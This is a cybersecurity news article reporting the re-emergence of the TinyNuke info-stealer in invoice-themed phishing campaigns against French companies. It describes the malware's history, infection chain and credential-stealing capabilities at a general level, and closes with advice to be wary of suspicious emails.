TinyNuke, an info-stealing malware, has reappeared in the wild to deploy new campaigns targeting French users for the second time. This info-stealing malware uses invoice-themed baits in emails sent to corporate email addresses and employees in the business, technology, manufacturing, and construction sectors.
This reemerging cyber-espionage aims to exfiltrate credentials and other confidential data and install payloads onto infected networks.
The TinyNuke operation first revealed itself back in 2017, peaked in 2018, decreased its function in 2019, and almost shut down in 2020. According to a cybersecurity group, this reappearance is revealed via two separate sets of operations, containing two independent command-and-control infrastructures, payloads, and bait mechanics.
Some researchers believe that these two separate operations can also imply that two respective threat actors use the info-stealing malware.
The TinyNuke payload that attacked French users was hosted on authentic websites.
TinyNuke’s operators infect legitimate French websites to hold the payload URL, while executables are obfuscated as non-toxic software. The latest campaigns utilise Tor for the command-and-control communications, and an identical method operated in 2018.
In recent campaigns, emails are attached by threat actors with URLs that download ZIP files. These ZIP files contain a JS file that will trigger PowerShell commands to download and run the TinyNuke malware. In terms of abilities, TinyNuke loader can exfiltrate credentials with web-inject capabilities for Chrome, Firefox, and Internet Explorer. It can also steal credentials with form-grabbing and can install additional payloads.
Although the current attacks utilise particular lures, the threat actors could easily revise the phishing messages presented to their targets.
Furthermore, suppose there are new actors identified to be also using TinyNuke info-stealer. In that case, experts believe that the developer of this malware is selling it on the dark web’s black market.
As of now, TinyNuke’s deployment could increase to unprecedented heights, and the range of email bait distributed against users could become more comprehensive than its normal state in previous years.
It is vital to stay vigilant and mindful and avoid clicking on attached URLs or embedded buttons that can lead to malicious sites hosting a compressed executable. Since highly sophisticated attacks render AV scanners useless, users should always be wary when navigating through unwanted emails.
